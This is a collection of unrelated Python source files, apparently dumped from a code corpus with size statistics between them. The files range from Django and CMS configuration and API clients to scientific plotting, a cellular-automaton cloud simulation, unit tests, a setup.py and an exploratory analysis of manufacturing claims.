DEFAULT_FROM_EMAIL = 'Dental Hub<abhiyantriktech@gmail.com>'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'abhiyantriktech@gmail.com'
EMAIL_HOST_PASSWORD = 'password'
EMAIL_PORT = 587
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {
# exact format is not important, this is the minimum information
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
},
'file': {
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
}
},
'handlers': {
# console logs to stderr
'console': {
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'formatter': 'file',
'filename': os.path.join((BASE_DIR), "debug.log")
}
},
'loggers': {
# default for all undefined Python modules
'': {
'level': 'INFO',
'handlers': ['console', 'file']
},
},
})
| 7,209 | 2,520 |
# pylint: disable=missing-docstring
from __future__ import print_function
import unittest
import biograph
import biograph.variants as bgexvar
class ReadCovTestCases(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.bg = biograph.BioGraph("datasets/lambdaToyData/benchmark/father_lambda.bg")
cls.seqset = cls.bg.seqset
cls.rm = cls.bg.open_readmap()
cls.ref = biograph.Reference("datasets/lambdaToyData/benchmark/ref_lambda")
cls.reflen = cls.ref.scaffold_lens['lambda']
def test_add_ref(self):
asms = bgexvar.add_ref_assemblies(self.ref, "lambda", [], whole_ref=True, max_len=100)
asms = list(asms)
self.assertEqual(len(asms), (self.reflen // 100) + 1)
seq = biograph.Sequence()
for a in asms:
seq += a.seq
self.assertEqual(len(seq), self.reflen)
rc_asms = bgexvar.add_ref_assemblies(self.ref, "lambda", [], whole_ref=True, max_len=100,
rev_comp=True)
rc_asms = list(rc_asms)
self.assertEqual(len(rc_asms), (self.reflen // 100) + 1)
rc_seq = biograph.Sequence()
for a in rc_asms:
rc_seq += a.seq
self.assertEqual(len(rc_seq), self.reflen)
self.assertEqual(seq, rc_seq.rev_comp())
if __name__ == '__main__':
unittest.main(verbosity=2)
| 1,379 | 508 |
import requests
def get_quotes(access_token,
my_client,
symbols):
"""
Function to get quotes of a list of stocks
"""
# Convert list to string
str_symbols = ','.join(symbols)
# define our headers
header = {'Authorization':"Bearer {}".format(access_token),
"Content-Type":"application/json"}
    # define the endpoint for market data quotes
endpoint = 'https://api.tdameritrade.com/v1/marketdata/quotes'
# payload with symbols
payload = {'symbol': str_symbols,
'apikey': my_client.key}
    # make a GET request to the quotes endpoint with the headers and query params
content = requests.get(url = endpoint, headers = header, params=payload)
# json response
json_response = content.json()
# quote symbols
quote_symbols = list(json_response.keys())
return json_response, quote_symbols
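# Illustrative call (not executable as-is): `access_token` comes from the OAuth
# flow and `my_client` is assumed to expose the consumer key as `.key`; both
# are placeholders here.
#
#   quotes, found_symbols = get_quotes(access_token, my_client, ['AAPL', 'MSFT'])
#   # `quotes` maps each returned symbol to its quote fields,
#   # `found_symbols` lists the symbols the API actually returned.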
| 924 | 270 |
from pathlib import Path
api_key_name = "api_key_cosmin"
portrait_gif = Path("devdata") / "portrait.gif"
api_base = "https://sandbox.zamzar.com/v1" # SANDBOX
# api_base = "https://api.zamzar.com/v1" # LIVE
| 210 | 93 |
import FWCore.ParameterSet.Config as cms
process = cms.Process("EwkDQM")
process.load("DQM.Physics.ewkElecDQM_cfi")
process.load("DQMServices.Core.DQM_cfg")
process.load("DQMServices.Components.DQMEnvironment_cfi")
process.DQM.collectorHost = ''
#keep the logging output to a nice level
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 1
# load the full reconstruction configuration, to make sure we're getting all needed dependencies
process.load("Configuration.StandardSequences.MagneticField_cff")
#process.load("Configuration.StandardSequences.GeometryRecoDB_cff") #old one, to use for old releases
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.GlobalTag.globaltag = 'FT_53_V21_AN6::All'
#process.GlobalTag.globaltag = 'START70_V2::All'
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
# input = cms.untracked.int32(5000)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
## '/store/relval/CMSSW_3_1_1/RelValWM/GEN-SIM-RECO/STARTUP31X_V1-v2/0002/8E5D0675-E36B-DE11-8F71-001D09F242EF.root'
# MinBias real data!
# '/store/data/BeamCommissioning09/MinimumBias/RECO/v2/000/124/196/3C9489A4-B5E8-DE11-A475-001D09F2A465.root',
#'/store/data/BeamCommissioning09/MinimumBias/RECO/v2/000/124/188/34641279-B5E8-DE11-A475-001D09F2910A.root',
# Real data
#'/store/data/Run2012B/SingleElectron/AOD/22Jan2013-v1/30000/FE93DA20-837E-E211-8A41-002481E73676.root'
# 'file:12251709-D77E-E211-96C8-003048F118FE.root' # data
# , 'file:5072427B-407E-E211-88EF-003048F237FE.root' #data
# 'file:DEC5AD62-280C-E311-89A7-002618FDA216.root'
# 'file:/tmp/andriusj/ZeePU.root'
'file:/tmp/andriusj/Data2012D_DoubleEl.root'
)
)
runOnData = False
#process.dqmEnv.subSystemFolder = 'SMP'
process.dqmSaver.producer = 'DQM'
process.dqmSaver.workflow = cms.untracked.string('/Physics/EWK/Elec')
process.dqmSaver.convention = 'Offline'
process.dqmSaver.saveByRun = cms.untracked.int32(-1)
process.dqmSaver.saveAtJobEnd =cms.untracked.bool(True)
process.dqmSaver.forceRunNumber = cms.untracked.int32(1)
if runOnData:
process.dqmSaver.saveByRun = cms.untracked.int32(1)
process.dqmSaver.saveAtJobEnd =cms.untracked.bool(False)
process.dqmSaver.forceRunNumber = cms.untracked.int32(-1)
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('detailedInfo'),
detailedInfo = cms.untracked.PSet(
default = cms.untracked.PSet( limit = cms.untracked.int32(100) ),
threshold = cms.untracked.string('DEBUG')
#threshold = cms.untracked.string('INFO')
#threshold = cms.untracked.string('ERROR')
)
)
#process.ana = cms.EDAnalyzer("EventContentAnalyzer")
process.p = cms.Path(process.ewkElecDQM+process.dqmSaver)
| 3,077 | 1,376 |
#version 1
#
#
#Setup data structure
#Made timer that includes fps
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import pyqtgraph as pg
import numpy as np
import random
#import time
from pyqtgraph.ptime import time
import functools
app = QtGui.QApplication([])
w = gl.GLViewWidget()
w.show()
g = gl.GLGridItem()
w.addItem(g)
def nearFunction(mat,i,j,k):
return mat[i+1,j,k-1] or mat[i,j+1,k-1] or mat[i,j,k-1] or \
mat[i-1,j,k] or mat[i,j-1,k] or mat[i,j,k-1] or \
mat[i+2,j,k] or mat[i,j+2,k] or \
mat[i-2,j,k] or mat[i,j-2,k] or mat[i,j,k-2]
def makeSeedRand(mat):
row, col, layer = mat.shape
for i in range(2, row-2):
for j in range(2, col-2):
for k in range(2, layer-2):
#p = 0.311
p = 0.211
randNum = random.uniform(0, 1)
if(randNum <= p):
mat[i,j,k] = 1
#matB[i,j,k] = 1
# if(1*(row/3) < i and i < 2*(row/3)): #middle third
# if(1*(col/3) < j and j < 2*(col/3)): #middle third
# if(k < 1*(layer/3)):
# #if(1*(layer/3) < k and k < 2*(layer/3)): #middle third
# randNum = random.randint(0,25)
# if(randNum <= 1):
# mat[i,j,k] = 1
# #matB[i,j,k] = 1
# else:
# randNum = random.randint(0,250)
# if(randNum <= 1):
# mat[i,j,k] = 1
def plantSeed(mat, numSeeds):
#put in the middle third of box
row, col, layer = mat.shape
for i in range(numSeeds):
rowRand = random.randint(2,row-2);
colRand = random.randint(2,col-2);
layerRand = random.randint(2,layer-2);
mat[rowRand,colRand,layerRand] = 1
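# The vectorized update below implements cellular-automaton style rules
# (a sketch of the intent, using the humidity/activation/cloud bit arrays):
#   hum(t+1) = hum(t) AND NOT act(t)
#   cld(t+1) = cld(t) OR  act(t)
#   act(t+1) = NOT act(t) AND hum(t) AND (any activated neighbour, per the
#              offsets listed in nearFunction above)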
def iterateForwardVector():
humCopy = hum.copy()
actCopy = act.copy()
cldCopy = cld.copy()
row, col, lay = hum.shape
hum[2:row-2, 2:col-2, 2:lay-2] = humCopy[2:row-2, 2:col-2, 2:lay-2] & (~ actCopy[2:row-2, 2:col-2, 2:lay-2])
cld[2:row-2, 2:col-2, 2:lay-2] = np.logical_or(cldCopy[2:row-2, 2:col-2, 2:lay-2] , actCopy[2:row-2, 2:col-2, 2:lay-2])
matR1 = np.roll(np.roll(act,-1,axis=0),1,axis=2) # mat[i+1,j,k-1]
matR2 = np.roll(np.roll(act,-1,axis=1),1,axis=2) # mat[i,j+1,k-1]
matR3 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR4 = np.roll(act,1,axis=0) # mat[i-1,j,k]
matR5 = np.roll(act,1,axis=1) # mat[i,j-1,k]
matR6 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR7 = np.roll(act,-2,axis=0) # mat[i+2,j,k]
matR8 = np.roll(act,-2,axis=1) # mat[i,j+2,k]
matR9 = np.roll(act,2,axis=0) # mat[i-2,j,k]
matR10 = np.roll(act,2,axis=1) # mat[i,j-2,k]
matR11 = np.roll(act,2,axis=2) # mat[i,j,k-2]
    # any activated cell in the neighbourhood defined by matR1..matR11
    neighbour_act = np.logical_or.reduce(
        [m[2:row-2, 2:col-2, 2:lay-2] for m in
         (matR1, matR2, matR3, matR4, matR5, matR6,
          matR7, matR8, matR9, matR10, matR11)])
    act[2:row-2, 2:col-2, 2:lay-2] = (~ actCopy[2:row-2, 2:col-2, 2:lay-2]) & \
        humCopy[2:row-2, 2:col-2, 2:lay-2] & neighbour_act
lenI = 60
lenJ = 60
lenK = 60
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
sp2 = gl.GLScatterPlotItem(pos=indexesFinal,size=1.5,pxMode=False)
w.addItem(sp2)
def resetVars():
global hum, act, cld, indexesFinal
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
totalIterations = 80
numIteration = 0
lastTime = time()
fps = None
def update():
global numIteration, indexesFinal, lastTime, fps
if(numIteration < totalIterations) :
sp2.setData(pos=indexesFinal)
indexes = np.where(cld==1)
indexesFinal = np.array([[indexes[0][i],indexes[1][i],indexes[2][i]] for i in range(len(indexes[0]))])
iterateForwardVector()
numIteration+=1
else:
resetVars()
numIteration = 0
now = time()
dt = now - lastTime
lastTime = now
if fps is None:
fps = 1.0/dt
else:
s = np.clip(dt*3., 0, 1)
fps = fps * (1-s) + (1.0/dt) * s
print('%0.2f fps' % fps)
t = QtCore.QTimer()
t.timeout.connect(update)
t.start(5)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| 4,809 | 2,637 |
from .displacy_entity_generator import DisplacyEntityGenerator
| 63 | 17 |
import numpy as np
from artificial_neural_network.layer import Layer
class BiasLayer(Layer):
def __init__(self, dim, learning_rate=0.001):
self.__biases = np.zeros(dim)
self.__learning_rate = learning_rate
def forward(self, x):
return x + self.__biases
def backward(self, x, gradient_y):
gradient_x = gradient_y
gradient_biases = np.sum(gradient_y, axis=0)
self.__biases = self.__biases - self.__learning_rate * gradient_biases
return gradient_x
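# Quick shape sketch (illustrative; `dim` and the batch size are arbitrary):
#
#   layer = BiasLayer(dim=3)
#   x = np.zeros((4, 3))                     # batch of 4 samples
#   y = layer.forward(x)                     # adds the (initially zero) biases
#   gx = layer.backward(x, np.ones_like(y))  # SGD step on the biases; the
#                                            # incoming gradient passes through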
| 521 | 167 |
from unittest import TestCase
from iota import Address, TransactionHash
from tangle_connector import TangleConnector
class TestTangleConnector(TestCase):
def setUp(self):
self.tangle_con = TangleConnector()
def test_get_node(self):
res = self.tangle_con.get_node()
self.assertEqual(res['appName'], 'IRI')
def test_get_tips(self):
res = self.tangle_con.get_tips()
self.assertTrue(res['hashes'])
def test_get_hashes_from_addr(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
tx_list = self.tangle_con.get_hashes_from_addr(addr)
self.assertTrue(tx_list)
def test_get_trytes_from_hashes(self):
tx = TransactionHash(b'LFHPLTGTTNCYZRCHHCQCBMGUJKFMEHWUDRMHHRUVWNTERXHVEYKWSMZDRLKSYLBFUVTTOFKOFLJI99999')
trytes_list = self.tangle_con.get_trytes_from_hashes([tx])
self.assertTrue(trytes_list)
def test_get_all_trytes_from_address(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
hashes_and_trytes = self.tangle_con.get_all_trytes_from_address(addr)
self.assertTrue(hashes_and_trytes)
def test_send_msg_to_addr(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
res = self.tangle_con.send_msg_to_addr(addr, 'test_string', 'TESTTAG')
self.assertNotIn('Error', res.keys())
def test_get_bundles_from_addr(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
res = self.tangle_con.get_bundles_from_addr(addr)
self.assertTrue(res)
def test_get_messages_from_bundles(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
res = self.tangle_con.get_bundles_from_addr(addr)
output = self.tangle_con.get_messages_from_bundles(res)
self.assertTrue(output)
| 2,102 | 920 |
"""
Helix: Flight Test (c) 2021 Andrew Hong
This code is licensed under GNU LESSER GENERAL PUBLIC LICENSE (see LICENSE for details)
"""
from SakuyaEngine.controllers import BaseController
class PlayerController(BaseController):
def __init__(self) -> None:
super().__init__()
self.is_shooting = False
class SecondaryController(BaseController):
def __init__(self) -> None:
super().__init__()
| 426 | 136 |
import bbhash
# some collection of 64-bit (or smaller) hashes
uint_hashes = [10, 20, 50, 80]
num_threads = 1 # hopefully self-explanatory :)
gamma = 1.0 # internal gamma parameter for BBHash
mph = bbhash.PyMPHF(uint_hashes, len(uint_hashes), num_threads, gamma)
for val in uint_hashes:
print('{} now hashes to {}'.format(val, mph.lookup(val)))
# can also use 'mph.save(filename)' and 'mph = bbhash.load_mphf(filename)'.
| 433 | 174 |
""" Script used to call the upload service"""
from vesicashapi.base import VesicashBase
class Upload(VesicashBase):
@classmethod
def upload(cls, **kwargs):
return cls().requests.post('upload/file', data=kwargs)
| 229 | 72 |
#!/usr/bin/env python
from setuptools import setup
# Work around mbcs bug in distutils.
# http://bugs.python.org/issue10945
import codecs
try:
codecs.lookup('mbcs')
except LookupError:
ascii = codecs.lookup('ascii')
codecs.register(lambda name, enc=ascii: {True: enc}.get(name == 'mbcs'))
VERSION = '0.1.3'
setup(
name='crea-graphenelib',
version=VERSION,
description='Python library for graphene-based blockchains',
long_description=open('README.md').read(),
download_url='https://github.com/creativechain/crea-python-graphenelib/tarball/' + VERSION,
author='Creativechain Foundation',
author_email='info@creativechain.org',
maintainer='Creativechain Foundation',
maintainer_email='info@creativechain.org',
url='http://www.github.com/creativechain/crea-python-graphenelib',
keywords=[
'graphene',
'api',
'rpc',
'ecdsa',
'secp256k1'
],
packages=["grapheneapi",
"graphenebase",
],
install_requires=["ecdsa",
"requests",
"websocket-client",
"pylibscrypt",
"pycryptodome",
],
classifiers=['License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
include_package_data=True,
)
| 1,618 | 500 |
"""
using-enum-declaration:
using elaborated-enum-specifier ;
"""
import glrp
from ...parser import cxx98
from be_typing import TYPE_CHECKING
@glrp.rule('using-enum-declaration : "using" elaborated-enum-specifier ";"')
@cxx98
def using_enum_declaration(self, p):
# type: (CxxParser, glrp.Production) -> None
pass
if TYPE_CHECKING:
from ...parser import CxxParser | 383 | 143 |
t = int(input())
for i in range(t):
pattern = input()
lindex, rindex = map(int, input().split())
d = len(pattern)
a_list = []
r_count = 0
l_count = 0
flag = 0
for j in range(d):
if pattern[j] == "B":
a_list.append(j +1)
    for j in a_list:
        # positions j, j+d, j+2d, ... of the repeated pattern are 'B';
        # count those no greater than rindex ...
        temp = (rindex - j)//d + 1
        r_count += temp
        # ... and those no greater than lindex, which are subtracted below
        temp = (lindex - j)//d + 1
        l_count += temp
        # if lindex itself falls on a 'B' position, add it back so the
        # final count covers the closed range [lindex, rindex]
        if (lindex - j) % d == 0:
            flag = 1
print("Case #", i+1, ": ", r_count - l_count + flag, sep="")
| 531 | 207 |
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def parse_method_path(method_path):
""" Returns (package, service, method) tuple from parsing method path """
# unpack method path based on "/{package}.{service}/{method}"
# first remove leading "/" as unnecessary
package_service, method_name = method_path.lstrip('/').rsplit('/', 1)
# {package} is optional
package_service = package_service.rsplit('.', 1)
if len(package_service) == 2:
return package_service[0], package_service[1], method_name
return None, package_service[0], method_name
| 1,121 | 329 |
#!/usr/bin/env python3
"""Reads all the headers in a folder and creates a vola index.
@author Jonathan Byrne
@copyright 2018 Intel Ltd (see LICENSE file).
"""
from __future__ import print_function
import argparse
import glob
import os
import struct
import json
def main():
"""Read the headers, calc the centroids and output."""
parser = argparse.ArgumentParser()
parser.add_argument("pathname",
help="the path containing volume files", type=str)
args = parser.parse_args()
dirname = args.pathname.rstrip('/')
dataset = os.path.basename(dirname)
volaname = os.path.join(dirname, dataset) + ".vola"
vol = os.path.join(dirname, "*.vol")
infofile = os.path.join(dirname, "info.json")
print("Processing folder:", dirname, " output:", volaname)
files = []
tminx, tminy, tminz = float('inf'), float('inf'), float('inf')
tmaxx, tmaxy, tmaxz = float('-inf'), float('-inf'), float('-inf')
filenames = glob.glob(vol)
hdr = {}
for filename in filenames:
with open(filename, "rb") as f:
hdr['headersize'] = struct.unpack('I', f.read(4))[0]
hdr['version'] = struct.unpack('H', f.read(2))[0]
hdr['mode'] = struct.unpack('B', f.read(1))[0]
hdr['depth'] = struct.unpack('B', f.read(1))[0]
hdr['nbits'] = struct.unpack('I', f.read(4))[0]
hdr['crs'] = struct.unpack('I', f.read(4))[0]
hdr['lat'] = struct.unpack('d', f.read(8))[0]
hdr['lon'] = struct.unpack('d', f.read(8))[0]
minx = struct.unpack('d', f.read(8))[0]
miny = struct.unpack('d', f.read(8))[0]
minz = struct.unpack('d', f.read(8))[0]
maxx = struct.unpack('d', f.read(8))[0]
maxy = struct.unpack('d', f.read(8))[0]
maxz = struct.unpack('d', f.read(8))[0]
if minx < tminx:
tminx = minx
if miny < tminy:
tminy = miny
if minz < tminz:
tminz = minz
if maxx > tmaxx:
tmaxx = maxx
if maxy > tmaxy:
tmaxy = maxy
if maxz > tmaxz:
tmaxz = maxz
bbox = [minx, miny, minz, maxx, maxy, maxz]
sides = [maxx - minx, maxy - miny, maxz - minz]
centroid = ((minx + maxx) / 2, (miny + maxy) / 2, (minz + maxz) / 2)
files.append({
'filename': filename,
'bbox': bbox,
'centroid': centroid,
'sides': sides,
'crs': hdr['crs'],
'lat': hdr['lat'],
'lon': hdr['lon']
})
if not os.path.isfile(infofile):
print("Missing attribution info file!! Attribution is required")
exit()
else:
with open(infofile) as data_file:
infodata = json.load(data_file)
if len(infodata['license']) < 5:
print("No license information!! License is required")
exit()
vola = {}
print("Depth:", hdr['depth'])
vola['dataset'] = infodata['dataset']
vola['info'] = infodata['info']
vola['url'] = infodata['url']
vola['author'] = infodata['author']
vola['authorurl'] = infodata['authorurl']
vola['license'] = infodata['license']
vola['licenseurl'] = infodata['licenseurl']
vola['files'] = files
vola['depth'] = hdr['depth']
vola['nbits'] = hdr['nbits']
vola['crs'] = hdr['crs']
vola['mode'] = hdr['mode']
vola['bbox'] = [tminx, tminy, tminz, tmaxx, tmaxy, tmaxz]
vola['sides'] = [tmaxx - tminx, tmaxy - tminy, tmaxz - tminz]
vola['centroid'] = ((tminx + tmaxx) / 2, (tminy + tmaxy) / 2,
(tminz + tmaxz) / 2)
    with open(volaname, 'w') as volafile:
        volafile.write(json.dumps(vola, sort_keys=True, indent=2))
if __name__ == '__main__':
main()
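# Illustrative invocation (the script name and path are placeholders): scans
# every *.vol header under the folder, requires an attribution info.json, and
# writes <folder>/<folder>.vola next to the volumes:
#   python make_index.py /data/my_volume_set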
| 3,852 | 1,426 |
from datetime import datetime, timedelta
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.optimize as opt
def area_chart(ds, dateFmt):
# create a subplot
fig, ax = plt.subplots()
# set figure size and dpi
fig.set_size_inches(10, 5)
fig.set_dpi(300)
# draw the curves
ax.fill_between(
ds['Data'],
ds['Casos acumulados'],
color='#f44336',
label='Casos totais ({})'.format(ds['Casos acumulados'].values[-1]))
ax.stackplot(
ds['Data'],
ds['Óbitos acumulados'],
ds['Curados acumulados'],
colors=['#9a9a9a', '#009688'],
labels=[
'Óbitos totais ({})'.format(ds['Óbitos acumulados'].values[-1]),
'Curados totais ({})'.format(ds['Curados acumulados'].values[-1])])
# write the total number at the end of the curves
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Casos acumulados'].values[-1],
str(ds['Casos acumulados'].values[-1]),
color='w')
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Curados acumulados'].values[-1],
str(ds['Curados acumulados'].values[-1]),
color='w')
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Óbitos acumulados'].values[-1],
str(ds['Óbitos acumulados'].values[-1]),
color='w')
# set chart style
ax.xaxis.set_major_formatter(dateFmt)
ax.set_facecolor('#101010')
# set chart title
ax.title.set_text(
'Situação geral da COVID-19 em Fernandópolis - {}'
.format(ds['Data'].iloc[-1].strftime('%d/%m/%Y')))
# draw legend on the upper left corner
ax.legend(loc='upper left')
# save chart as a png
fig.savefig('../images/area_chart.png')
def bar_chart(ds, dateFmt):
# create a subplot
fig, ax = plt.subplots()
# set figure size and dpi
fig.set_size_inches(10, 5)
fig.set_dpi(300)
# calculate moving average
moving_average = ds['Novos casos'].rolling(window=14).mean()
# draw the bars
ax.bar(
ds['Data'],
ds['Novos casos'],
color='#f44336',
label='Casos novos de {} ({})'.format(
ds['Data'].iloc[-1].strftime('%d/%m/%Y'),
ds['Novos casos'].values[-1]))
ax.plot(
ds['Data'],
moving_average,
color='#f4a235',
linestyle='dashed',
label='Média móvel de casos novos ({})'.format(
int(np.trunc(moving_average.iloc[-1]))))
# write the number of cases at the top of each bar
for date in ds['Data']:
i = (date - datetime.fromisoformat('2020-03-25')).days
y = ds['Novos casos'].values[i]
if y != 0:
ax.text(
date - np.timedelta64(12, 'h'),
y + 0.25,
str(y),
color='w')
# set chart style
ax.xaxis.set_major_formatter(dateFmt)
ax.set_facecolor('#101010')
# set chart title
ax.title.set_text(
'Casos novos da COVID-19 em Fernandópolis - {}'
.format(ds['Data'].iloc[-1].strftime('%d/%m/%Y')))
# draw legend on the upper left corner
ax.legend(loc='upper left')
# save chart as a png
fig.savefig('../images/bar_chart.png')
def line_chart(ds, dateFmt):
# create a subplot
fig, ax = plt.subplots()
# set figure size and dpi
fig.set_size_inches(10, 5)
fig.set_dpi(300)
# polynomial function
def func(x, a, b, c, d, e, f, g):
params = [a, b, c, d, e, f, g]
n = len(params)
total = 0
for i in range(0, n):
total += params[n - i - 1] * np.power(x, i)
return total
    # optimized parameters for polynomial curve fitting
optimizedParameters, _ = opt.curve_fit(
func,
ds['Data'].map(
lambda x: (x - datetime.fromisoformat('2020-03-25')).days),
ds['Casos acumulados'])
# list of days extended over 7 days
extDate = ds['Data'].copy()
for i in range(1, 8):
extDate = extDate.append(
pd.Series(
[ds['Data'].iloc[-1] + timedelta(days=i)],
index=[ds['Data'].size + i - 1]))
# draw the curves
ax.plot(
ds['Data'],
ds['Casos acumulados'],
color='#f44336',
label='Casos totais ({})'.format(ds['Casos acumulados'].values[-1]))
ax.plot(
extDate,
func(
extDate.map(
lambda x: (x - datetime.fromisoformat('2020-03-25')).days),
*optimizedParameters),
color='#f4a235',
linestyle='dashed',
label='Projeção do número de casos até {} ({:.0f})'.format(
extDate.iloc[-1].strftime('%d/%m/%Y'),
np.floor(func(
(extDate.iloc[-1] - datetime.fromisoformat('2020-03-25')).days,
*optimizedParameters))))
# write the number of cases at the end of the curve
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Casos acumulados'].values[-1],
str(ds['Casos acumulados'].values[-1]),
color='w')
ax.text(
extDate.iloc[-1] + timedelta(hours=12),
func(
(extDate.iloc[-1] - datetime.fromisoformat('2020-03-25')).days,
*optimizedParameters),
'{:.0f}'.format(
np.floor(func(
(extDate.iloc[-1] - datetime.fromisoformat('2020-03-25')).days,
*optimizedParameters))),
color='w')
# set chart style
ax.xaxis.set_major_formatter(dateFmt)
ax.set_facecolor('#101010')
# set chart title
ax.title.set_text(
'Casos da COVID-19 em Fernandópolis - {}'
.format(ds['Data'].iloc[-1].strftime('%d/%m/%Y')))
# draw legend on the upper left corner
ax.legend(loc='upper left')
# save chart as a png
fig.savefig('../images/line_chart.png')
def main():
ds = pd.read_csv('../boletim-epidemiologico.csv')
ds['Data'] = ds['Data'].map(
lambda x: datetime.strptime(str(x), '%d/%m/%y'))
dateFmt = mdates.DateFormatter('%d/%m/%y')
area_chart(ds, dateFmt)
bar_chart(ds, dateFmt)
line_chart(ds, dateFmt)
if __name__ == '__main__':
main()
| 6,324 | 2,310 |
# %% [markdown]
'''
# Calculate suspect score for manufacturing claims
'''
# %% [markdown]
'''
# Problem statement
'''
# %% [markdown]
'''
**Author** : Sunil Yadav || yadav.sunil83@gmail.com || +91 96206 38383 ||
'''
# %% [markdown]
'''
# Solution Approach
- Check if we can correctly segregate suspected claims
- Prepare model
'''
# %% [markdown]
'''
# Solution
'''
# %% [markdown]
'''
## Lib Imports
'''
# %%
import src.utils.eda as eu
import set_base_path
import numpy as np
import pandas as pd
from IPython.display import display
import plotly.figure_factory as ff
import plotly.graph_objects as go
from enum import Enum, auto
from typing import List, Sequence, Tuple
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import seaborn as sns
import plotly.express as px
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
import warnings
from src.constants import RAW_DATA_PATH, INTERIM_DATA_PATH, CLAIM_CAT_COLS
warnings.filterwarnings('ignore')
# %%
# Ignore warnings
# %% [markdown]
'''
## Data load
'''
# %%
# Load Data
merged_df: pd.DataFrame = pd.read_feather(INTERIM_DATA_PATH / "merged_df.feather")
claims_with_amount: pd.DataFrame = pd.read_feather(RAW_DATA_PATH / "claims_with_amount.feather")
labour: pd.DataFrame = pd.read_feather(RAW_DATA_PATH / "labour.feather")
parts_replaced: pd.DataFrame = pd.read_feather(RAW_DATA_PATH / "parts_replaced.feather")
# %% [markdown]
'''
## Pandas settings
'''
# %%
pd.options.display.max_columns = 300
pd.options.display.max_rows = 300
pd.options.display.width = None
pd.options.display.max_colwidth = 100
pd.options.display.precision = 3
# %% [markdown]
'''
# EDA
'''
# %% [markdown]
'''
## Data Overview
'''
# %% [markdown]
'''
### Merged DF
'''
# %%
# eu.get_data_frame_overview(merged_df)
# %%
# %%
pivoted_columns = list(labour['JOB_CODE'].unique()) + list(parts_replaced['INS_PART_CODE'].unique())
zeros = merged_df[pivoted_columns] == 0.
(((zeros).sum()*100)/merged_df.shape[0]).sort_values(ascending=False)
# %%
# Claims Data
eu.get_data_frame_overview(claims_with_amount)
# %%
# %% [markdown]
'''
### Univariate
'''
# %% [markdown]
'''
#### value counts
'''
# %%
eu.print_value_count_percents(claims_with_amount[CLAIM_CAT_COLS])
# %% [markdown]
'''
#### value counts plots
'''
# %%
eu.plot_univariate_categorical_columns(claims_with_amount[CLAIM_CAT_COLS], x_rotation=90, plot_limit=50)
# %% [markdown]
'''
#### distributions
'''
# %%
claims_with_amount.dtypes
# %%
num_cols = claims_with_amount.dtypes[claims_with_amount.dtypes == np.float64].index
# %%
claims_with_amount[num_cols].isnull().sum()
# %%
eu.plot_dist(claims_with_amount[num_cols])
# %% [markdown]
'''
## Drop unwanted columns
'''
# %% [markdown]
'''
## Fix column dtypes
'''
# %% [markdown]
'''
#### Plotting numeric and categorical
'''
# %%
num_cols, CLAIM_CAT_COLS
# %%
